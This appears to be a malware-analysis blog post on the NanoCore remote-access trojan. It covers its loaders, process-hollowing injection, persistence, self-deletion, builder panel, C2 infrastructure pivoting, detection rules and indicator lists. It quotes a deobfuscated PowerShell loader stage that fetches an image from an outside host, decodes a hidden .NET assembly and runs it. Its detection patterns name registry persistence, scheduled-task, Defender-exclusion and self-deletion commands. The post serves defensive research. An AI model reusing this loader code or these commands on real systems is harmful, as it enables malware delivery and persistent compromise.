NanoCore Update
_Overview
📡This is not a déjà vu, this is an update and improvement of the NanoCore which I looked at years ago because my analysis seems to me very incomplete, and in addition we see how it has evolved and new versions of this malware have been released📡
NanoCore (also known as Nancrat) is considered a RAT (Remote Admin Tool), which is used to obtain relevant information from victims such as data from the affected computer, camera captures, keyboard input, etc. It also serves as remote control for the attacker, who will have the ability to manipulate the system, remotely execute scripts, etc.
It first appeared in 2012, and its author was sentenced to over two years in prison in 2017. The code for NanoCore has been leaked on several occasions throughout its versions, allowing different criminal groups like APT to use it at some point, potentially refining or adding functionalities. And undoubtedly, it has also been used by countless Script Kiddies.
NanoCore, therefore, has been used in a multitude of ways and has been notably seen in Spear-Phishing, where it is introduced in a document or in a ZIP/RAR file that triggers the execution of a loader or another malware that runs it. However, it has also been observed in the download of links for some software, trying to appear as a legitimate program, which ends up in the same situation as a download of a script or a ZIP containing a NancRAT loader.
As mentioned earlier, NanoCore has been used by various groups, which, given the functionality of the malware, would act in the intermediate phase of the attack where they already have access to the infrastructure and want relevant information and the ability to freely access it. Although a large number of campaigns using NanoCore in conjunction with other malware that could not be attributed have been seen, there is evidence of groups that have historically been seen using NanoCore:
- APT33 | RefinedKitten (🇮🇳)
- Gorgon Group (🇵🇰)
- Vendetta (🇹🇷)
- TA2719 (🏴)
- TA2722 (🏴)
- Aggah (🏴)
_Technical Analysis
As I mentioned earlier, actors often deploy NanoCore in different ways, although the most typical ones are the aforementioned Spear-Phishing where the file download is usually a ZIP/RAR or a document that will subsequently initiate the download or extract the RAT loader. A large number of these malware have been analyzed to understand how current versions work (not only NanoCore itself, but also the previous loaders that try to prevent you from knowing the real functionality). Therefore, the most common action after the execution of this step prior to the RAT is usually, depending on versions, the creation of auxiliary files or copies of itself in temporary paths and/or the injection of NanoCore into dropped files or simply into .NET-related software, which, once here, can work more freely. At different points, it will have the ability to create persistence in tasks or in registries and obtain basic information from the affected device that will be sent to the C&C.
As always, a representative view of most versions I have seen in the form of a graph that I hope will be useful is as follows:
As I mentioned, this is just a representative version because if we look at the execution, everything some of the samples do is quite chaotic, but we’ll address it shortly.
Although the main NanoCore is in .NET, the loaders are usually also in .NET or, failing that, in C++ or script format, with VBS being the most commonly seen.
As I mentioned, in the initial stages, it usually starts with Spear-Phishing, but I’ll skip this part as I have analyzed many docs in the past, and we’ll move on to the next phase where we already have a loader. Here, for example, we find .NET, unobfuscated or obfuscated depending on the version.
The truth is that they are really similar, and once deobfuscated, the versions are quite similar to each other (Green=Before, Red=After).
In these executions, we often see similar execution patterns where the main binary spawns a copy of itself and executes various commands using cmd.
This first layer actually has a clear objective, which is to extract another binary, which will be the injector, whose code is usually obfuscated in some way, but the good thing is that they haven’t been very clever, and the base64 could be easily extracted
Let me show you in detail what happens here by extracting it from memory
It actually didn’t make sense to extract it from memory because I was going to write it to a txt, but the excitement got to me (I have to be less geeky). So we see the content, and it indeed matched what I had extracted from memory and what I was writing to disk in the temporary folder
This binary (.NET) is quite easily recognizable as the injector due to the functions it contains. Furthermore, we can see that once again, they like to use Process Hollowing (But we’ll get to this layer later)
Something not all versions do is have a compilation phase. So, we can see that sometimes at this point, the binary that has been dropped in text format is passed through CSC + CVTRES. The summary of the operation would be the following graph, in which we can observe how it collects the txt that it just wrote and compiles it, getting it ready
I haven’t found too many samples with this section, so I found it interesting. In other versions, directly from memory, they perform the injection by extracting NanoCore. The truth is that the first layer doesn’t have much more to it. Depending on the versions, it prepares the injector or does what we just saw and prepares the next phase.
Following with this point, what’s extracted in memory, NanoCore has the ability to create persistence. So, we can see how, through cmd.exe, it executes a reg add to create an entry in CurrentVersion\RUN. Here, it’s common to find different duplications or copies of the loader binary in different folders. I understand they want to maximize persistence, so they persist differently and with identical files in different paths
A graph of persistence is as follows:
In one of these paths, where it has dropped a copy of the original binary, we find the typical .dat file, which is quite characteristic of NanoCore.
In addition to all this, this binary has other capabilities such as downloading other binaries or checking privileges
But the most important thing about this is really the injection because it will first have a module to see where it will host the next block of code. As we can see, it’s not very original, as most RATs that perform injection do it on these processes or on themselves (either in the form of executing a dropped copy or by extracting another thread from the main process when injected)
Before getting into the graph, it’s worth mentioning that it’s quite common for NanoCore to host it as another resource or it may have it obfuscated in memory and extract it at runtime before injection. Given what we’ve seen, we can already guess that what it’s going to inject is NanoCore.
It’s important to note that in most of the samples I’ve analyzed, at some point, whether in the script, in the C++ or .NET prior, or the injector or NanoCore itself, it’s obfuscated in some way to complicate analysis. So, the NanoCore client won’t be an exception (Green=After, Red=Before -I don’t know why I’ve done it the other way round here-)
The explanatory graph of the injection (Sorry if I haven’t explained here how Process Hollowing works but I’ve already explained it in other posts and I think I’m a bit annoying, you can find it in SmokeLoader):
Moving on to the third layer, we would have NanoCore, whose functionalities are very varied and also depend on the version.
What we can see more immediately is the self-deletion we mentioned earlier, which it does to itself (as well as killing the main process) in some versions because it no longer needs it. It has it distributed in different folders and has already created persistence. It’s injected into another process, so in case something fails or the device shuts down, the execution chain would restart, and it would inject one of the processes we’ve seen before, and we’d be back to the same point
For you to see it in conjunction, the deletion process:
It has different capabilities such as downloading, establishing connections, controlling registries and folders, acting as a keylogger, creating more persistence, etc.
I didn’t want to introduce other versions during the explanation because I think it complicates comprehension, but for you to compare with another sample and see that in the end, it does the same thing but with a different path.
Here we would have another sample in C++
We can see that the processes it follows are similar even though the compilation is different. We see how it extracts a binary, which would be the injector.
It also performs deobfuscation tasks where (As I mentioned earlier, it always does something like this in one of the phases) it deobfuscates the imports of the binary it’s going to use in memory. This isn’t so strange because it’s actually done so that when you run “strings” you don’t see other referenced imports and libraries, or simply because if you’re analyzing statically, you don’t notice that it might be something interesting
We really see that it does the same thing, an execution of an MSBuild that creates it in a suspended state because it injects the NanoCore code using Process Hollow
What it injects in the end is, as you can see, the same, even though the NanoCore isn’t the same and the path isn’t either, it’s VERY similar, and we end up in the same place.
Once again, we have to deobfuscate it to extract it
In script versions, we could say that we simply add one more layer to the previous version where an obfuscated VBS performs a normal download or simply deobfuscates the code of the first layer we analyzed before, which could be a .NET or a C++ that would act as a loader.
Here we can see the execution of a deobfuscated VBS that actually leads us to the download of the code that will simply position us in layer number 1 again. This code reminded me a lot of the BlindEagle campaign from last year because of the use of PNG + Pastebin
$imageUrl = 'https://wallpapercave[.]com/uwp/uwp4203994[.]png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('Aspose.DrawingSpec.PkikAttrCertNB');
$method = $type.GetMethod('Run').Invoke($null, [object[]] ('https://paste[.]ee/d/0VD04/0' , 'desativado' , '2' , 'VbsName' , '1' , 'C:\ProgramData\', 'LnkName','MSBuild','desativado','desativado','desativado'))
I didn’t want to delve deeper because I realized when I was analyzing some VBS samples that Matthew (@embee_research) had done this work relatively recently, so I can’t see a better way to understand it than to watch his video. Great job, dude!
VBS Decoding With Cyberchef (Nanocore Loader)
After this, we only need to see how it behaves at the network level, but as it’s a RAT, obviously it simply sends requests and waits for responses from the C&C, but it helps us collect IOCs
An example of all these versions in a cooler/hacker view
- .NET
.
├ Principal binary .NET (NanoCore Loader)
├---Writes the injector in temp path (Contains NanoCore in Rsrc)
├------Compile injector
├-----------Persistence
├----------------AutoDelete
├----------------------Load Rsrc (NanoCore)
├------------------------------Injection over itself or .NET sw
├---------------------------------------C&C connection
- C++
.
├ Principal binary C++ (NanoCore Loader)
├-----------Persistence
├----------------AutoDelete (Not all)
├----------------------Load Rsrc Or Mem (NanoCore)
├------------------------------Injection over itself or .NET sw
├---------------------------------------C&C connection
- Script
.
├ Principal VBS (Obfuscated)
├---Wscript
├------Powershell execution
├-----------Obtain .NET from external web
├----------------Create/Copy/Move script in tmp
├----------------------Persistence
├--------------------------Load .NET (NanoCore)
├--------------------------------Injection over itself or .NET sw
├-----------------------------------------C&C connection
At this point in NanoCore, it would already be installed, it would have persistence, and certainly it would be injected into a process that at first glance shouldn’t be found, so the attacker would already have the ability to connect to our device and work with it, pivot to other teams, etc
_NanoCore versions comparision
At this point, I encountered different versions of NanoCore, as there are several variants in the wild, so I was curious to see if they differed significantly from each other.
At first glance, it didn’t seem like they were very similar.
But breaking down the clients, we can see that they actually have almost the same functions.
The versions that were most repeated, as you can see, are 1.2.2.0 and 1.2.2.2. Both in functionality and in features, they are practically identical
We can see that where one is called GClass1, the equivalent in another version is GClass8, but the functionality is the same and the work it performs is also similar
The functionality of each function itself has been discussed earlier. It has the ability to delete, create users, act as a keylogger, turn on cameras, obtain files, logs, etc., but I think it will be better and more representative to see it in the following section.
_Intelligence
It is always important to be aware of what is happening, what is being discussed, or the trends of actors or, in this case, the malware that concerns us.
So we find people in underground forums selling or giving access to tools, among which NanoCore is included
We can also see people who want to understand or who have problems using NanoCore, or basically people recognizing the user because they had caught them attacking with a NanoCore (How crazy are these blogs :D).
At other times, we find people sharing the status of their NanoCore with affected computers, asking about its operation
On the other hand, we find various versions of NanoCore in forums and blogs where we can see more visually how it works.
First, it allows us to create the builder, which will carry the general connection characteristics it will have
Once a computer is infected (obviously, this is for academic use only; nobody should try it with another person), we can find it in our panel
In this panel, we will be able to access the functionalities we had seen earlier
You can do almost anything you can think of since you can control processes, files, users, logs, peripherals, launch commands, so it is an incredible support point to move through the network or simply to have control over devices. A summary of everything it can do would be as follows:
_Pivoting
At this point, I had collected a large number of IOCs, so although they are not from a specific incident, and it will be observed that they belong to different actors or attackers due to the significant difference in their infrastructure used, I believe it is always a good point and an essential source of knowledge to understand how TA/APTs have reached our infrastructure or what infrastructure they are using to establish communication or C&C. Therefore, this section, which I have learned and improved thanks to people like Michael @MichalKoczwara or Joshua @josh_penny, where we can see great work at @Intel_Ops_io, it’s amazing, thanks guys!
NanoCore has recently been trending with the use of dynamic domain name system (ddns) domains for C&C communications, which always makes tracking a bit more difficult. I think it is a good point to know a little more about this, and I just found a post from someone who explains it much better than I could, thanks John @Abjuri5t NanoCore RAT Hunting Guide.
Starting from an IP I found while analyzing samples, I found one hosted in the Netherlands whose ISP is Limenet. Pivoting, I found a large number of these hosted in Bulgaria, whose IPs in most cases were reported and related to NanoCore or other RATs. As I mentioned in previous points, attackers used other malware either to launch NanoCore or, depending on the victim, they used other RATs
Starting from another IP in Vietnam, I found through the ISP and port 137 others related to other RATs and NanoCore
I also found, by hash, by OS, or by ports, whose product was classified as NanoCore, another batch of related IPs, some of which were classified as NanoCore, although others were not even reported yet
The pivoting has been really long because I have found from where to pull other IPs that led me to other IPs and other hypotheses from where to pull the thread, like the one I am showing you right now from Sweden, all of which were self-signed and belonged to the same ISP
In conclusion, pivoting is really useful, and I recommend that you perfect it if, like me, you also like to know who is behind the attacks and from where they are spreading their tentacles.
Finally, I would like to thank you for reading this research and for supporting me :)
_Detection opportunities
Persistence
- [TA0003][T1547.001] Persistence using dropped files with reg.exe
(Command) *cmd.exe*/c*reg add*\Software\Microsoft\Windows\CurrentVersion\Run*/f /v*/t REG_SZ /d*
(Registry) *\SOFTWARE\Microsoft\Windows\CurrentVersion\Run > (RegName) NAT Host | sys-win32 > (RegData) *NAT Host* | *\Documents\*.exe
- [TA0003][T1053] Persistence on tasks using tmp dropped file
(Command) schtasks.exe*/create /f /tn*Host*/xml*AppData*.tmp*
Defense Evasion
- [TA0005][T1070.004] Delete principal binary and kill process with cmd
(Command) *cmd.exe*/C taskkill /f /im*& ping -n 1 -w 3000 1.1.1.1 & type nul >*& del /f /q*
- [TA0005][T1562] Create exclusion path in dropped files folders
(Command) *powershell.exe*Add-MpPreference -ExclusionPath*-Force
- [TA0005][T1055.012] Process injection over .NET files, taskmgr or itself
From unk file > injection > MSBuild | RegAsm | vbc | cvtres | applaunch | taskmgr | same unk proc.
Collection
- [TA0009][T1074] Create a .dat file in temporary file with CLSID pattern
(Folder Regex) \\AppData\\Roaming\\.*\w{8,9}\-\w{3,4}\-\w{3,4}\-\w{3,4}\-\w{9,13} > (File Write into prev. path) run.dat
Command & Control
- [TA0011][T1568] Connection via injected process to a DDNS
Unk proc injected | .NET injected > External conection > (Domain) *.ddns* | *duckdns* | *hopto*
_IOC
- Hash
B0E8EDEB5CBF2DF69257C01F323E9EB8
206547178c018a7f4db353375eb0f8e6
18a14e17a10caea0050d85f6d977f58f
B3CFEBDCB947EB0E4535AE55139ED7F7
B501CEF7B6C863A20ADD0EB45D69FD38
0531AEDA97ECFBB12A8CC39DA530877B
64856b16c1282d184f528bbbf603af92
2BCAB6A5802BFBFF17223862CBDB10E7
31deabb123e9965fbc81236113dfad08
0f41a135573fcbcc4f1b36684527438a
2bcab6a5802bfbff17223862cbdb10e7
7b249a96beab0ab4154778013da0071d
49fa1594271555f95aa333030802dea0
6b1adef13c5f6eddb7d995999ba1d406
- IP/Domain
High: Those I have found from samples or pivoting from NanoCore by launching requests to these domains/Ips
Medium: Pivoted IP/Domains that are related to other malware and potentially with NanoCore
Low: Very similar IFRs that are related to other malicious malwares
High
104[.]22[.]53[.]71
94[.]156[.]69[.]145
222[.]114[.]183[.]144
139[.]84[.]139[.]29
73[.]225[.]6[.]155
91[.]92[.]253[.]74
192[.]169[.]69[.]26
209[.]25[.]141[.]181
45[.]76[.]118[.]7
185[.]244[.]30[.]238
103[.]153[.]78[.]43
194[.]68[.]59[.]60
185[.]244[.]30[.]212
185[.]244[.]30[.]128
185[.]244[.]30[.]247
136[.]243[.]111[.]71
74[.]77[.]124[.]104
43[.]155[.]118[.]60
194[.]33[.]191[.]126
149[.]56[.]101[.]42
94[.]156[.]69[.]37
50[.]3[.]70[.]191
38[.]146[.]219[.]232
41[.]68[.]133[.]39
185[.]29[.]11[.]37
194[.]147[.]140[.]141
194[.]147[.]140[.]151
seeno[.]hopto[.]org
wallpapercave[.]com
customcheats[.]ddns[.]net
december2nd[.]ddns[.]net
december2n[.]duckdns[.]org
kgj112233[.]codns[.]com
maxlogs[.]webhop[.]me
Baggard437[.]ddns[.]net
driver-computational[.]at[.]ply[.]gg
victacking[.]ddns[.]net
strongodss[.]ddns[.]net
alexwill[.]ddns[.]net
emedoo[.]ddns[.]net
xp18[.]ddns[.]net
jiiihihihiguuhhgygygtdtdtgdsdxfulllbb[.]ydns[.]eu
Medium
91[.]92[.]243[.]71
91[.]92[.]253[.]236
91[.]92[.]243[.]178
91[.]92[.]252[.]192
94[.]156[.]71[.]212
91[.]92[.]241[.]163
91[.]92[.]250[.]119
91[.]92[.]251[.]198
91[.]92[.]241[.]58
185[.]244[.]30[.]80
103[.]153[.]79[.]164
103[.]153[.]78[.]182
103[.]153[.]79[.]210
103[.]153[.]78[.]93
103[.]153[.]78[.]214
103[.]153[.]78[.]59
185[.]189[.]49[.]67
185[.]189[.]50[.]129
194[.]68[.]59[.]65
185[.]189[.]51[.]65
194[.]68[.]59[.]51
194[.]68[.]59[.]60
194[.]68[.]59[.]71
86[.]107[.]103[.]43
167[.]114[.]9[.]80
167[.]114[.]9[.]81
167[.]114[.]9[.]82
167[.]114[.]9[.]84
Low
94[.]156[.]69[.]232
91[.]92[.]250[.]52